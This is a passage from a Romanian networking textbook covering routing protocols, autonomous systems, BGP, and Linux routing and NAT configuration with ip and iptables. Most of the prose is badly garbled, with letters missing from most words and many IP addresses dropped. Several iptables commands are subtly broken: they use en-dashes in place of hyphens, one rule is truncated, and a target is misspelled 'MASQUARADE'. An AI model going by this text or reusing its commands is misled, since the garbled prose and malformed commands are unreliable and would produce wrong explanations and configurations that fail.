‘IP î atego ia p oto oalelo de uta e i te ă u o o e ge ţă s ăzută. Î ăsu a î a e se
i pu e u ti p de o e ge ţă ai i , pe ioada de a tualiza e poate fi edusă, du â d î să
la u o su ai idi at de lăţi e de a dă.
Fiecare router e p i eşte u pa het de a tualiza e a i e e ta et i a fie ă ei ute
o ţi ute î pa het u , deoa e e utele o ţi ute î pa het îi su t a esi ile p i
i te ediul u ui hop supli e ta , şi a u e routerul ce a trimis pachetul de actualizare. Apoi,
pe t u fie a e di t e utele di pa hetul de a tualiza e, a î e a să dete i e da ă u e istă
deja o ută u o et i ă ai u ă ăt e a eeaşi desti aţie î ta ela de uta e.
4.3.4 Protocoale link state

Protocoalele de tip link-state azate pe sta ea o e iu ii o st uies o ază de date u
î t eaga topologie a eţelei şi al ulează drumul cel mai scurt pe baza unui algoritm de tip
Dijkstra (SPF - shortest path first).
Astfel, pentru actualizarea tabelelor de rutare se trimite într-o p i ă etapă î t eaga ta elă
de uta e ăt e toate routerele e ulează a elaşi p oto ol de uta e, a easta realizându-se
p i folosi ea î â pul desti aţie a u ei ad ese logi e de ulti ast spe ifi e fie ă ui p oto ol
î pa te. După a eastă etapă de t i ite e a tutu o i fo aţiilo , u ită şi flooding,
a tualiză ile se o efe tua doa la apa iţia u ei s hi ă i î topologie, ia pa hetele de
a tualiza e o o ţi e doa i fo aţii desp e utele odifi ate, a estă etodă de a tualiza e
numindu-se a tualiza e i e e tală.
P i ipala p o le ă a a esto tipu i de p oto oale este ă fie a e di t e routere va trebui
să o st uias ă a o ele topologi , şi apoi să e t agă utele a d u u i opti e î a est a o e.
A est p o es e esită esu se de e o ie şi p o eso se ifi ati e. Î plus, efo tul
o figu ă ii u ui p oto ol azat pe sta ea o e iu ii este adesea ult mai mare decât cel
e esa pe t u a o figu a u p oto ol azat pe e to i de dista ţă.
Cu toate a estea ti pul de o e ge ţă pe t u p oto oalele link-state este semnificativ
mai redus decât pentru protocoalele distance-vector. A easta se dato ează i iţie ii p o esului
de a tualiza e odată u apa iţia odifi ă ilo î topologie, p e u şi folosi ii ad esă ii
ulti ast, şi de i a p opagă ii i fo aţiilo de a tualiza e î î t eaga eţea.
4.4 Sisteme autonome

4.4.1 Ce este un sistem autonom?
Dată fii d di e siu ea I te etului, toate p oto oalele utate t e uie să supo te o
s he ă de ad esa e ie a hi ă. Cu toate a estea, la o a a tuală e istă ze i de ilioa e de
eţele, astfel î ât u router di u leul I te etului a a ea o ta elă de uta e u iaşă.
În realitate, î plus faţă de ele două i elu i de ie a hiza e aduse de p oto olul utat,
eţelele su t g upate î siste e auto o e sau A“ autonomous systems).
140 | ‘ e ţ e l e L o a l e
Un sistem autonom este o ole ţie de routere aflate su o ad i ist aţie o u ă.

O ad i ist aţie o u ă se efe ă la u set o u de p oto oale de uta e, u set de
politi i de se u itate şi de ite ii de de izie. O a a te isti ă i po ta tă a u ui A“ este faptul
ă o i e I“P, pe t u a putea a ti a î I te et, t e uie să se afilieze u ui siste auto o .
Un sistem autonom este identificat printr-un u ăr AS de u it şi adresă A“. Acest
u ă poate fi up i s î t e şi . , u toate ă ulti ul seg e t al a estui spaţiu de
ad ese, şi a u e u e ele î t e . şi . , su t eze ate pe t u uz p i at, si ilar
claselor de adrese IP private.
At i ui ea u ui u ă A“ se fa e de IANA Internet Assigned Numbers Authority . P eţul
de U“D este ese ifi ati , da ostul eal pe t u u I“P ţi e de i o aţia o ţi e ii
adresei. Procedura de justificare a unui numă A“ fa e i posi ilă o ţi e ea u ui u ă A“ de
ISP-u ile i i şi edii. “i gu a opţiu e pe t u a estea este de a i t a î t -u A“ deja e iste t şi
de a a epta egulile şi politi ile de se u itate şi uta e ale a estuia.
4.4.2 Protocoale de rutare inter-AS

Odată u g upa ea eţelelo î siste e auto o e a apă ut şi p o le a dez oltă ii de
p oto oale a e să fa ă faţă e i ţelo ută ii î t e A“-uri. În acest scop s-a definit clasificarea
protocoalelor în protocoale de tip IGP (Interior Gateway Protocol şi p otocoale de tip EGP
(Exterior Gateway Protocol). IGP sunt protocoalele de rutare interioare unui sistem autonom,
iar EGP sunt protocoalele de rutare exterioare unui AS, sau, altfel spus, protocoale de rutare
inter-AS.
P i a şi ea ai i po ta tă e i ţă pe t u u p oto ol de tip EGP este de a fa e faţă u o
tabele de rutare semnificativ mai mari decât orice se poate întâlni în interiorul unui AS. O
ta elă de I te et a tuală a e este s hi ată î t e două routere de g a iţă di siste e
autonome diferite cuprinde aproximativ 180.000 de rute.
A doua e i ţă este ea de fle i ilitate. Deşi u ele di t e p oto oalele i te e foloses
pâ ă la i i fa to i pe t u dete i a ea et i ii, folosi ea u ei fo ule pe t u dete i a ea
ostului u ei ute u ofe ă u g ad suficient de flexibilitate. Procesul complet de comparare a
două sau ai ulte ute pe t u BGP , sp e e e plu, este u algo it u paşi.
Î plus, u ă ul i fo aţiilo aso iate u o ută eşte se ifi ati . Pe t u u IGP
si gu ele i fo aţii t a s ise su t: eţea desti aţie, as ă, et i ă, î e e e pe t u BGP
ai t e uie p e izate şi at i ute a: origin, as_path, next_hop, local_pref,
atomic_aggregate, aggregator, multi_exit_disc.
O altă s hi a e faţă de uta ea i te ă o ep ezi tă s hi a ea pa adigmei de
se u itate. Astfel, da ă s-ar considera un protocol de rutare inter-A“ după ite iile ută ii
lasi e adi ă i te e , EGP a fi î atego ia e t e -pa a oi . A eastă s hi a e a pa adig ei
de se u itate, o elată u e i ţa de fle i ilitate, se traduce printr-o eşte e a g adului de
o ple itate a o figu ă ii u ui EGP.
Pe de altă pa te, e i ţele de o e ge ţă pe t u u EGP su t destul de eduse, dato ită
faptului ă legătu ile de u leu su t e t e de sta ile. Astfel, ti pul de o e ge ţă pentru
BGP este de o di ul o elo ai deg a ă de ât al i utelo - precum în cazul unui protocol de
uta e i te ă.
“p e deose i e de uta ea i te ă, uta ea i te -A“ u lasă lo pe t u e iste ţa ai
ulto p oto oale dife ite, dato ită a tităţii i po ta te de esu se, da şi dato ită u ă ului
elati edus de siste e auto o e. Câştigăto ul o petiţiei este, fă ă î doială, BGP 1.
1
Î p i ipiu, BGP fu ţio ează la fel a o i e p oto ol de uta e, î se sul ă s hi ă

tabele de rutare cu routerele vecine. Î plus faţă de u IGP, BGP ai t a s ite odată u
a estea şi i fo aţia de A“, p e u şi o se ie de alte at i ute. Astfel, u router BGP va
o st ui aşa-numitele AS-paths, specificând AS-u ile p i a e t e uie sa t ea ă u pa het
pâ ă la desti aţie. Folosind aceste AS-paths, BGP e ită u lele de uta e.
Este i po ta t de p e izat ă BGP t a s ite esajele î apsulate î seg e te TCP,
folosi d po tul dedi at . D ept o se i ţă, î ai te de a putea ula o sesiu e BGP, t e uie
a î t e ele două odu i să e iste ute. Cel ai adesea ali e ta ea i iţială a ta elelo de
uta e este ealizată de u IGP, da la fel de i e o e iu ea poate fi sta ilită şi p i p e iza ea
unor rute statice.
Î ai te de a î heia apitolul t e uie a e tuat ă u e istă o ie a hie u i ă a
protocoalelo de uta e. Nu e istă u „ el ai u p oto ol de uta e a e să fie opti pe t u
o i e eţea. Deseo i, i sistâ d pe o pa aţia di t e dife ite p oto oale, se s apă di ede e ă
soluţia ea ai u ă pe t u u o te t dat poate fi uta ea stati ă. A est lu u este ala il u
doa î eţelele de i i di e siu i, i hia şi pe t u i te o e ta ea a două siste e
auto o e dife ite. BGP ofe ă u g ad idi at de fle i ilitate, da pe t u a e ploata a eastă
flexibilitate este nevoie de mai ult de o o e iu e ăt e I te et. Pentru un singur furnizor
de se i ii I te et, o si gu ă ută i pli ită poate fi sufi ie tă.
4.5 Configurări la nivel de router în Linux

“iste ul de ope a e Li u pe ite o figu a ea u ei staţii a router. Aceasta înseamnă ă
staţia espe ti ă poate să p i eas ă pa hete IP de la alte staţii di eţea, să dete i e alea
sp e desti aţia pa hetelo şi, î azul î a e este posi il, să t i ită t afi ul ăt e desti aţie.
Pe t u a ealiza a este fu ţii, se e ţi e la i elul u leului o ta elă de uta e, pe aza
ă eia se dete i ă t aseul ăt e desti aţia u ui pa het.
O o se aţie i po ta tă efe itoa e la uta ea di Li u este ă u leul lu ează si ulta
u două ta ele de uta e: FIB (Forwarding Information Base) este tabela uzuală la a e se face
referire p i te e ul de ta elă de uta e, ia routing cache este o ta elă e a ele ează
uta ea p i păst a ea ulti elo ute utilizate î t -o memorie cache.
După u s-a p eze tat î se ţiu ile a te ioa e, e istă două tipu i de rute: statice
adăugate a ual de utilizato ul siste ului şi di a i e î ăţate p i i te ediul u ui
p oto ol de uta e, p e u ‘IP, O“PF, BGP . Dato ită faptului ă, î ge e al, routerele Linux se
afla la periferia Internetului, rutele statice sunt suficiente pentru a asigura rutarea.
4.5.1 Activarea rutării

Pe t u a pe ite o uta ea pa hetelo î t e două i te feţe ale a eleiaşi aşi i a ti a ea
comportamentului de router , t e uie a ti ată a ia ila ip_forward. Activarea se poate
realiza temporar sau permanent.
A ti a ea te po a ă se ealizează p i i te ediul procfs:
cuirass:~# cat /proc/sys/net/ipv4/ip_forward
0
cuirass:~# echo 1 > /proc/sys/net/ipv4/ip_forward
cuirass:~# cat /proc/sys/net/ipv4/ip_forward
1
sau sysctl:
cuirass:~# sysctl -a | grep ip_forward
net.ipv4.ip_forward = 0
cuirass:~# sysctl -w 'net.ipv4.ip_forward=1'
142 | ‘ e ţ e l e L o a l e
Co figu a ea pe a e tă se ealizează p i edita ea fişie ului sysctl.conf:

cuirass:~# cat /etc/sysctl.conf | grep -B 1 ip_forward
# Uncomment the next line to enable packet forwarding for IPv4
#net.ipv4.ip_forward=1
cuirass:~# vi /etc/sysctl.conf
cuirass:~# cat /etc/sysctl.conf | grep -B 1 ip_forward
# Uncomment the next line to enable packet forwarding for IPv4
net.ipv4.ip_forward=1
Fişie ul a fi i te p etat î o e tul epo i ii siste ului. “e poate fo ţa epo i ea sa tot

p i i te ediul i te feţei sysctl:
cuirass:~# sysctl -p
4.5.2 Configurarea rutelor

Î od t adiţio al, utilita ul route a i tit ai sus este folosite pe t u a adăuga, espe ti
pe t u a şte ge ute di ta ela de uta e.
Î epâ d de la e siu ea de u leu . a apă ut u ou utilitar pentru configurarea
pa a et ilo de eţea, u os ut su u ele iproute. Ajuns la cea de a doua versiune
(iproute2 , a esta ep ezi tă o alte ati ă pute i ă, pe iţâ d ealiza ea de o figu ă i
foarte sofisticate. Utilitarul iproute este folosit prin intermediul comenzii ip. Do u e taţia
utilita ului este dată de pagi a de a ual man 8 ip . Î azul ută ii o do u e taţie
i i ală poate fi izualizată p i ula ea o e zii:
cuirass:~# ip r help
Usage: ip route { list | flush } SELECTOR
ip route get ADDRESS [ from ADDRESS iif STRING ]
[ oif STRING ] [ tos TOS ]
ip route { add | del | change | append | replace | monitor } ROUTE
[...]
Exemplele prezentate în continuare vor folosi preponderent utilitarul iproute2.
4.5.2.1 Vizualizare tabelei de rutare

Ta ela de uta e se afişează p i i o a ea o e zii ip u a gu e tul route:
cuirass:~# ip r
172.16.68.0/24 dev eth0 proto kernel scope link src 172.16.68.128
default via 172.16.68.2 dev eth0
“e o se ă ă se pot edu e a gu e tele la o se e ţă i i ă u i ă. “e pot sele ta

i t ă ile di ta ela de uta e după a u ite ite ii, folosi d a gu e tul list:
cuirass:~# ip r l type local
cuirass:~# ip r l type unicast
cuirass:~# ip r l scope link
172.16.68.0/24 dev eth0 proto kernel src 172.16.68.128
cuirass:~# ip r l scope host
cuirass:~# ip r l scope global
Î ta elul de ai sus e istă o ută di e t o e tată link şi o ută i pli ită. ‘uta di e t
o e tată este i te faţa eth0 p i a e siste ul se o e tează la eţeaua lo ală. ‘uta i pli ită
foloseşte a gateway 172.16.68.2.
4.5.2.2 Adăugarea de rute

Pe t u a adăuga o ută ăt e o eţea / host, se foloseşte o a da ip r a:
cuirass:~# ip r l

cuirass:~# ip r a 192.168.38.100/32 via 172.16.68.2
cuirass:~# ip r a 192.168.38.0/24 via 172.16.68.2
cuirass:~# ip r l
192.168.38.100 via 172.16.68.2 dev eth0
192.168.38.0/24 via 172.16.68.2 dev eth0
În exemplul de mai sus s-a adăugat o ută de tip host ăt e staţia u ad esa IP
. . . şi o ută de tip eţea ăt e eţeaua . . . .
Î e e plul u ăto se adaugă o ută i pli ită:
cuirass:~# ip r a default via 172.16.68.4
cuirass:~# ip r l
192.168.38.100 via 172.16.68.2 dev eth0
192.168.38.0/24 via 172.16.68.2 dev eth0
Ta ela de uta e poate fi alte ată p i i te ediul o e zii ip r change:

cuirass:~# ip r c default via 172.16.68.5
cuirass:~# ip r l
192.168.38.100 via 172.16.68.2 dev eth0
192.168.38.0/24 via 172.16.68.2 dev eth0
Sunt întâlnite frecvent cazuri î a e este e oie de ai ulte ute ăt e o si gu ă

desti aţie. Moti ul p i ipal al u ei astfel de i ple e tă i este edu da ţa. În cazul în care o
ută de i e i utiliza ilă, poate fi folosită u a di t e utele de eze ă. C ite iul pe t u
stabilirea rutei principale este costul acesteia. Din punct de vedere al sistemului de operare,
p io itatea utelo este sta ilită de et i ă. Rutele instalate folosind comenzile de mai sus au
et i a default . Pe t u s hi a ea et i ii şi p io itiza ea utelo se poate folosi opţiu ea
metric la adăuga ea u ei i t ă i î ta ela de uta e:
cuirass:~# ip r a 192.168.3.2 via 172.16.68.5 metric 5
cuirass:~# ip r l match 192.168.3.2
192.168.3.2 via 172.16.68.5 dev eth0 metric 5
Comanda ip r l match este folosită pe t u a afişa i t ă ile di ta ela de uta e a e

o espu d u ei a u ite eţele. Î e e plul de ai sus se afişează uta de tip host ăt e
. . . şi uta i pli ită a e se pot i eşte u o i e ad esă.
4.5.2.3 Ştergerea de rute

Şte ge ea de ute este ai si plă de ât adăuga ea, deoa e e u t e uie spe ifi ată de ât
eţeaua / staţia sp e a e du e uta.
‘utele di ta ela de uta e pot fi şte se u ajuto ul o e zii ip route del. În exemplele
de ai jos se eli i ă o ută de tip host, o ută de tip eţea şi o ută i pli ită:
cuirass:~# ip r l
192.168.3.2 via 172.16.68.5 dev eth0 metric 5
192.168.38.100 via 172.16.68.2 dev eth0
192.168.38.0/24 via 172.16.68.2 dev eth0
cuirass:~# ip r d 192.168.3.2
cuirass:~# ip r d 192.168.38.0/24
cuirass:~# ip r d default
cuirass:~# ip r l
192.168.38.100 via 172.16.68.2 dev eth0
144 | ‘ e ţ e l e L o a l e
4.5.2.4 Adăugarea de rute u ara ter per a e t

Pe t u a odifi ă ile efe tuate asup a ta elei de uta e să ai ă a a te pe a e t, se
foloseşte fişie ul /etc/network/interfaces. Î a est fişie pot fi o figu ate o e zi a e să
adauge rute la pornirea sistemului sau î o e tul folosi ii s iptu ilo de i te a ţiu e
specifice (/etc/init.d/networking).
Co figu a ea utei i pli ite se ealizează p i i te ediul di e ti ei gateway. Mai jos este
p e izată o o figu aţie a e adaugă uta i pli ită ăt e . . . şi o ută ăt e staţia
192.168.38.100:
cuirass:~# cat /etc/network/interfaces
[...]
allow-hotplug eth0
auto eth0
address 172.16.68.128
netmask 255.255.255.0
broadcast 172.16.68.255
gateway 172.16.68.2
dns-nameservers 172.16.68.2
up ip route add 192.168.38.100/32 via 172.16.68.5
cuirass:~# /etc/init.d/networking restart
Reconfiguring network interfaces...done.
cuirass:~# ip r l
192.168.38.100 via 172.16.68.5 dev eth0
Opţiu ea up este folosită la ula ea u ei o e zi după a ti a ea i te feţei. Î e e plul de

ai sus, după a ti a ea i te feţei se adaugă o ută ăt e eţeaua . . . .
4.6 NAT - Network Address Translation

NAT1 ofe ă posi ilitatea s hi ă ii u ei ad ese IP cu o alta din antetul unui pachet IP. În
p a ti ă, NAT se foloseşte pe t u a pe ite staţiilo a e utilizează ad ese p i ate să a eseze
Internetul.
Deoa e e e istă u u ă destul de a e de eţele e o e tate la I te et, IETF a
î e at să egle e teze folosi ea ad eselo î ad ul a esto eţele. “oluţia2 a fost definirea
u o spaţii de ad ese p i ate, ad ese e u pot fi utate pe I te et.
Clasa Spaţiul de adrese

A 10.0.0.0/8 10.0.0.0 – 10.255.255.255
B 172.16.0.0/12 172.16.0.0 – 172.31.255.255
C 192.168.0.0/16 192.168.0.0 – 192.168.255.255
4-4: Clasele private de adrese
O ţi e ea u ei eţele a e u ost fi de $ plus TVA. Costul este foa te i , da p o esul

este a e oios, deoa e e e esită justifi a ea di e siu ii spaţiului de ad ese, p e u şi o
aştepta e de pâ ă la lu i.
Folosi ea ad eselo p i ate ofe ă o s he ă de ad esa e apidă şi o odă. Î plus, dato ită
faptului ă ad esele staţiilo u su t a esi ile di afa a eţelei, folosi ea adreselor private
este deseo i o side ată u a di t e ele ai efi ie te politi i de se u itate.
Î a elaşi ti p, ad esele p i ate pu o se ie de p o le e. Cea ai i po ta tă este faptul
ă routerul p i a e eţeaua p i ată a esează I te etul a t e ui să fie apa il să fa ă
o e sia ad eselo p i ate î ad ese pu li e, de i să uleze u se i iu de NAT. A est se i iu
1
2
i pu e o late ţă supli e ta ă pe t u fie a e pa het e t a zitează routerul. Un alt

deza a taj este a ela ă î i te io ul u ei eţele p i ate u se e o a dă plasa ea de
al ulatoa e a e ofe ă se i ii pu li e, î t u ât este difi il să fie i iţiate o e iu i di e te io
ăt e a estea.
Tra slatarea stati ă a adreselor presupune constituirea unei tabele de translatare ce va
atribui întotdeau a a eeaşi ad esă pu li ă pe t u o ad esă p i ată dată. T e uie să e iste î
a est az u u ă egal de ad ese pu li e şi ad ese p i ate.
Tra slatarea di a i ă a adreselor presupune definirea unui rezervor de adrese publice,
care apoi vor fi atribuite î fu ţie de o di ea î a e staţiile soli ită o e iu i u I te etul.
Odată î heiată ulti a o e iu e a u ei staţii, ad esa pu li ă este etu ată î eze o ul de
ad ese, putâ d fi alo ată u ei alte staţii. A a tajul ajo al a estei i ple e tă i este ă
u ă ul ad eselo pu li e poate fi se ifi ati ai edus de ât al elo p i ate. Da ă sp e
exemplu se ia o eţea u de al ulatoa e, da di a e pe I te et u su t i iodată ai
ult de u sfe t, atu i se poate ealiza o t a slata e di a i ă a ad eselo pe u spaţiu de
de ad ese pu li e, şi u a î azul t a slată ii stati e.
Tra slatarea adreselor u supraî ăr are este fo a ea ai des î tâl ită de NAT. Î
prezent, când se face referire la translatarea adreselor, în realitate se face referire la
t a slata ea ad eselo u sup aî ă a e. A eastă etodă ofe ă posi ilitatea folosi ii u ei
si gu e ad ese pu li e pe t u ai ulte staţii e a esează I te etul. Di a eastă auză
a eastă etodă ai este u ită şi NAT ulti-la-unu sau PAT (Port Address Translation).
A a tajul PAT este ă pe ite u u ă de ap o i ati de o e saţii si ulta e de
la orice host i te ăt e e te io u o si gu ă ad esă e te ă. I ple e ta ea î lo uieşte
pa hetul di eţeaua lo ală u ad esa su să “, ad esa desti aţie D, po tul su să P, po tul
desti aţie Q, u altul ou e a a ea ad esa su să M ad esa routerului , ad esa desti aţie D,
po tul su să K. Po tul desti aţie u se s hi ă. De ase e ea se e o ează aso ie ea “,P -
K. Da ă u pa het aju ge pe router di e te io , a â d ad esa desti aţie M, ad esa su să Q şi
po tul desti aţie K, atu i a est pa het a fi î lo uit u u altul u ad esa desti aţie “, ad esa
su să Q, po tul desti aţie P şi a fi t i is î eţeaua lo ală. Po tul su să u se s hi ă.
Figu a de ai jos p ezi tă u e e plu de PAT. “taţiile di eţeaua lo ală u ad esele
. . . espe ti . . . se o e tează la staţia . . . p i ““H po tul desti aţie este
22). Gateway-ul u ad esa . . . as u de ide titatea elo două staţii şi ealizează
apa ea po tului al staţiei . . . peste po tul lo al şi el al po tului al
staţiei . . . peste po tul lo al .
U az spe ial al PAT îl ep ezi tă redirectarea. În acest caz se va înlocui pachetul primit
di eţeaua lo ală a â d ad esa su să “, ad esa desti aţie D, po tul P u u altul a â d ad esa
su să “, ad esa desti aţie M ad esa oute ului , po tul ‘ po tul î a e se fa e edi e ta ea,
spe ifi at de utilizato . ‘edi e ta ea este î ge e al folosită pe t u a implementa un proxy
t a spa e t, az î a e pe oute ul M po tul ‘ as ultă u proxy configurat pentru proxy
transparent.
146 | ‘ e ţ e l e L o a l e
10.0.0.2 64.6.8.13
141.85.37.1 141.85.37.1
10.0.0.2 52108 2002
22 22
Internet
10.0.0.3 64.6.8.13
64.6.8.13
141.85.37.1 141.85.37.1
52108 2003
10.0.0.3 22 22
4-5: NAT overloaded (PAT)
4.6.1 Translatarea de adrese în Linux

În Linux, translata ea ad eselo se ealizează folosi d utilita ul iptables. Utilitarul
iptables este folosit pe t u NAT şi pe t u filt a ea pa hetelo firewall software . După u
îi spu e şi u ele, utilita ul dispu e de ta ele aso iate a u ito s opu i:
 tabela nat este folosită pe t u NAT;
 tabela filter este folosită pe t u filt a ea pa hetelo ;
 tabela mangle este o ta elă folosită pe t u alte a ea a a sată a pa hetelo .
Fie a e ta elă o ţi e u set de la ţu i dedi ate u ui a u it tip de a ţiu e. Î fie a e la ţ
pot fi adăugate eguli spe ifi e a e defi es odul î a e o fi p elu ate di e sele pa hete.
Pe t u t a slata ea de ad ese se foloseşte tabela nat. Î a eastă ta elă e istă t ei la ţu i
predefinite: PREROUTING - odifi ă pa hetul i ediat e a esta i t ă în router, înainte de a fi
rutat, OUTPUT - odifi ă pa hetele ge e ate lo al î ai te a a estea să i t e î p o esul de
uta e, şi POSTROUTING - odifi ă pa hetele e u ează să ple e di router, după e a estea
au fost utate. Ţi tele alide su t ACCEPT, DROP, QUEUE, REJECT, LOG, SNAT, DNAT, MASQUARADE,
REDIRECT.
4.6.1.1 A țiu i î adrul ta elei at

A ţiu ile posi ile î ad ul ta elei NAT su t “NAT, DNAT, MA“QUE‘ADE şi ‘EDI‘ECT.
SNAT se foloseşte pe t u a i di a o t a slata e de ad ese de tip PAT pe adresa sursă.
Ad esa su să a pa hetului a fi odifi ată la u a di i te alul spe ifi at p i opţiu ea --to-
source. Cu a eeaşi opţiu e se poate spe ifi a şi i te alul î a e se a alege po tul su să â d
se fa e t a slata ea de ad ese. A eastă ţi tă este alidă u ai î la ţul POSTROUTING şi
la ţu ile he ate di a est la ţ .
DNAT se foloseşte pe t u o t a slata e de ad ese de tip PAT pe ad esa desti aţie. Ad esa
desti aţie a pa hetului a fi odifi ată la u a di i te alul spe ifi at p i opţiu ea --to-
destination. A eastă ţi tă este alidă u ai î la ţu ile PREROUTING şi OUTPUT şi la ţu ile
he ate di a est la ţ .
MASQUERADE este echivalent cu SNAT. Ad esa su să a fi î lo uită u ad esa setată a

i te feţei pe a e a fi t i is pa hetul. T e uie folosită î loc de SNAT da ă ad esa la a e se
fa e t a slata ea este setată di a i p i DHCP de e e plu .
REDIRECT se foloseşte pe t u a edi e ta pa hetul, lo al, pe po tul spe ifi at de opţiu ea
--to-port. A eastă ţi tă este alidă u ai î la ţu ile PREROUTING şi OUTPUT.
4.6.1.2 Exemple de utilizare a tabelei nat

Pe t u a e ide ţia ai i e lu u ile e ţio ate ai sus se pot u ă i egulile de ai jos:
iptables -t nat -A POSTROUTING -o eth1 –s 192.168.0.0/24 -j SNAT --to-source 1.2.3.4
iptables -t nat -A PREROUTING –i eth0 -d 14.15.16.17 -j DNAT --to-destination
192.168.100.1
P i a egulă poate fi i te p etată î felul u ăto : toate pa hetele e i u ad esa IP

su să di eţeaua . . . / o fi t i ise pe i te faţa eth1 u ad esa IP su să . . . ,
după e a estea vor fi rutate. Cea de-a doua egulă a s hi a ad esa IP desti aţie
. . . a pa hetelo e i t ă pe i te faţa eth0 cu adresa IP 192.168.100.1, înainte ca
a estea să fie utate.
Î e e plul de ai jos a fost p eze tată o figu a ea iptables pentru translatarea de
adrese pe sistemul 141.85.37.1 di eţeaua 192.168.1.0/24. A eastă aşi ă este doa
router, iar serverul de web, serverul de e- ail şi se e ul de DN“ ulează pe se e e dife ite, î
eţeaua i te ă. Routerul a e o e tată i te faţa eth0 la reţeaua i te ă şi i te faţa eth1 la
Internet.
iptables -t nat -A POSTROUTING -o eth1 -s 192.168.1.0/24 -j SNAT --to-source 141.85.37.1
iptables -t nat -A PREROUTING -i eth1 -p tcp --destination-port 80 -j DNAT --to-
destination 192.168.1.2
iptables -t nat -A PREROUTING -i eth1 -p udp --destination-port 53 -j DNAT --to-
P i a li ie di e e plu este folosită pe t u a staţiile di eţea să poată a esa I te etul.

La trecerea pachetelor prin router, ad esa su să a staţiilo ad esă p i ată a fi î lo uită u
adresa routerului ad esă pu li ă .
U ătoa ele li ii o t i ite traficul de web, e- ail şi DN“ ăt e se e ele di i te io . Î
acest context, din exterior, aparent routerul este şi se e de e , e- ail şi DN“.
Ce se î tâ plă da ă se do eşte a se i iile di eţeaua i te ă, a e su t fă ute publice,
să fie ăzute di e te io a ulâ d pe po tu i dife ite faţă de ele sta da d? Metoda e poate
fi apli ată ai i se u eşte port forwarding. A eastă etodă pe ite u ei staţii firewall să
t i ită e e ile e îi su t ad esate ăt e o altă staţie e a p o esa a este ereri. Cea mai
folosită î t e ui ţa e a a estei etode apa e â d se e ele ulează pe staţii aflate î eţeaua
i te ă după firewall). Cu alte cuvinte, se presupune e iste ţa u ui gateway u două
i te feţe, eth fii d o e tată la eţeaua i te ă şi eth1 la Internet. Fie 141.85.37.1 adresa IP
pu li ă a i te feţei eth1 şi . . . ad esa IP a staţiei pe a e ulează un serviciu web, pe
po tul i pli it , staţie e a putea fi a esată di e te io . Î e e plul de ai jos se a fa e
redirectarea conexiunilo e i pe . . . : <IP_e te :po t> ăt e . . . :
(IP_intern:port).
iptables -t nat -A PREROUTING -i eth1 -p tcp –d 141.85.37.1 –dport 8888 –j DNAT –-to-
destination 192.168.0.2:80
4.6.2 Alterarea avansată a pachetelor

Tabela mangle este folosită pe t u a odifi a at i ute spe ifi e ale pa hetelo . NAT
odifi ă doa ad esele di t -un pachet. Tabela mangle poate fi folosită pe t u a s hi a
148 | ‘ e ţ e l e L o a l e
i fo aţii p e u TTL, TO“, sau pe t u a a a u pa het. Ma a ea pa hetelo este folosită

doar în interiorul routerului. Odată e u pa het pă ăseşte routerul, i fo aţiile adăugate la
a a e o fi î depă tate. Î p eze t, a a ea pa hetelo este folosită de ăt e siste ul de
Quality of Service (QoS).
E istă t ei la ţu i p edefi ite: INPUT - odifi ă pachetele destinate routerului, FORWARD -
odifi ă pa hetele î u s de uta e, şi POSTROUTING - odifi ă pa hetele după uta e. Ţi tele
valide includ ACCEPT, DROP, QUEUE, REJECT, LOG p e u şi ele spe ifi e ta elei, p eze tate
mai jos.
MARK a hează pa hetul u aloa ea spe ifi ată p i opţiu ea --set-mark. Pachetele
marcate se pot folosi ulterior în procesul de rutare sau QoS.
TOS setează â pul de type of service la aloa ea spe ifi ată p i opţiu ea --set-tos.
TTL setează â pul TTL la aloa ea spe ifi ată p i opţiu ea --ttl-set, de e e tează
aloa ea a estuia da ă se foloseşte opţiu ea --ttl-dec sau i e e tează aloa ea
a estuia da ă se foloseşte opţiu ea --ttl-inc).
Mai jos este p eze tat u e e plu de alte a e a a sată a pa hetelo , î a e două staţii
di eţeaua i te ă, 141.85.37.13 şi 141.85.37.169 pot a esa doa eţeaua i te ă
eţeaua depa ta e tului şi eţeaua i ediat u ătoa e eţeaua o ga izaţiei .
iptables -t mangle -A FORWARD -s 141.85.37.13 -j TTL --ttl-set 2
4.6.3 Tunelare
O eţea p i ată i tuală VPN – Virtual Private Network ep ezi tă o odalitate de
asigu a e a u ei o e iu i sigu e peste o i f ast u tu ă pu li ă. P i ipalele teh ologii e
permit stabilirea unei astfel de o e iu i su t ipta ea şi tu ela ea. Odată u apa iţia
eţelelo p i ate i tuale de i el , o po e ta de ipta e a fost a a do ată, si gu a
a a te isti ă u i e sală a soluţiilo de VPN ă â â d tu ela ea.
P i ipalul s op al tu elă ii î tr-o eţea i tuală este de a as u de fă ă a alte a atât
ide titatea su sei ât şi a desti aţiei faţă de oute ele de pe pa u s, oute e e apa ţi
i f ast u tu ii pu li e. Da ă s-a apela la o t a slata e de ad esă, i fo aţiile o igi ale u a fi
accesi ile de ât se e ului de t a slata e de ad esă.
Î azul tu elă ii a tetul i iţial al pa hetului este păst at ealte at, ataşâ du-se un nou
a tet e a a ea a ad esă su să ad esa apătului lo al al tu elului, ia a ad esă desti aţie
adresa celuilalt capăt al tu elului.
Cel ai adesea tu ela ea se ealizează la i elul eţea p i tu ela ea t afi ului IP p i t -
un tunel IPv4, precum în cazul VPN, sau tunelarea unui alt protocol rutat, spre exemplu
tu ela ea t afi ului IP peste o i f ast u tu ă IP tunel 6to4).
“e poate folosi tu ela e şi î azul t afi ului de i el legătu ă de date, ea ai î tâl ită
etodă de tu ela e fii d tu ela ea dot1q, folosită de I“P î azul î a e a esta ofe ă
o se a ea i fo aţiilo de VLAN di eţelele lie ţilo .
O catego ie apa te de tu ela e o ep ezi tă tu ela ea de i el , folosită sp e e e plu î
arhitecturile de IP MPLS.
A â d î ede e ă p i ipalul s op al tu elă ii IP peste IP este a ela de a ofe i se u itate,
t e uie să ăspu de la î t e a ea:
Î e ăsu ă se o ţi e u plus de se u itate folosi d tu ela ea, atâta e e ât
i fo aţiile o igi ale se află î o ti ua e î ad ul o igi al?
‘ăspu sul la a eastă î t e a e ţi e de ap e ie ea olu ului foa te a e de date e
trebuie comutate în nucleul Internetului. Valoa ea foa te idi ată a t afi ului dete i ă a
o i e p elu a e adiţio ală a ad elo să ai ă o se i ţe se ifi ati e pe t u s ala ilitatea
eţelei. Altfel spus, deşi teo eti este posi ilă sele ta ea foa te p e isă doa a pa hetelo de
autentifica e pe t u sesiu ile de tel et sp e e e plu, o i spe ta e atât de a ă u ţită a

tutu o ad elo e su t o utate de oute poate du e la o s ăde e a pe fo a ţei u ui
oute dedi at de pâ ă la o aloa e de doa % di pe fo a ţa i iţială.
Cu toate acestea, î azul u ei i f ast u tu i pu li e u u g ad s ăzut de sigu a ţă
